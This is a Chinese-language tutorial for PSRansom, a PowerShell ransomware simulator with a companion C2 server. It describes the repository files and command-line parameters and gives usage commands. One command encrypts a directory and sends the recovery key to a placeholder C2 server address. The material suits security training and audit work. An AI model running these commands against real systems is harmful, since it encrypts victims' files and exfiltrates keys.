PSRansom 项目教程
1. 项目目录结构及介绍
PSRansom 项目的目录结构如下:
PSRansom/
├── C2Server.ps1
├── LICENSE
├── PSRansom.png
├── PSRansom.ps1
├── README.md
└── Demo/
└── ...
目录结构介绍
- C2Server.ps1: 这是 C2(命令与控制)服务器的脚本文件,用于接收和处理来自客户端的信息。
- LICENSE: 项目的许可证文件,本项目使用 GNU 3.0 许可证。
- PSRansom.png: 项目的图标文件。
- PSRansom.ps1: 这是项目的主脚本文件,用于模拟勒索软件的加密和解密过程。
- README.md: 项目的说明文件,包含项目的概述、使用方法和注意事项。
- Demo/: 这是一个示例目录,可能包含一些演示文件或脚本。
2. 项目启动文件介绍
PSRansom.ps1
PSRansom.ps1
是 PSRansom 项目的主脚本文件,用于模拟勒索软件的加密和解密过程。该脚本支持以下功能:
- 加密文件: 使用
-e
参数指定要加密的目录,并将恢复密钥发送到 C2 服务器。 - 解密文件: 使用
-d
参数指定要解密的目录,并使用恢复密钥进行解密。 - C2 服务器: 使用
-s
和-p
参数指定 C2 服务器的地址和端口。
使用示例
# 加密指定目录中的所有文件,并将恢复密钥发送到 C2 服务器
.\PSRansom.ps1 -e "C:\TargetDirectory" -s "C2ServerAddress" -p 8080
# 使用恢复密钥解密指定目录中的所有文件
.\PSRansom.ps1 -d "C:\TargetDirectory" -k "RecoveryKey"
3. 项目的配置文件介绍
PSRansom 项目没有传统的配置文件,所有的配置和操作都是通过命令行参数来完成的。以下是一些常用的命令行参数:
- -e Directory: 指定要加密的目录。
- -d Directory: 指定要解密的目录。
- -s C2Server: 指定 C2 服务器的地址。
- -p C2Port: 指定 C2 服务器的端口。
- -k RecoveryKey: 指定恢复密钥,用于解密文件。
注意事项
- 所有信息将发送到 C2 服务器,且没有任何加密。
- 需要预先生成恢复密钥以检索文件。
- 本工具仅用于教育环境和安全审计,使用时需获得相应客户的同意。
通过以上模块的介绍,您可以更好地理解和使用 PSRansom 项目。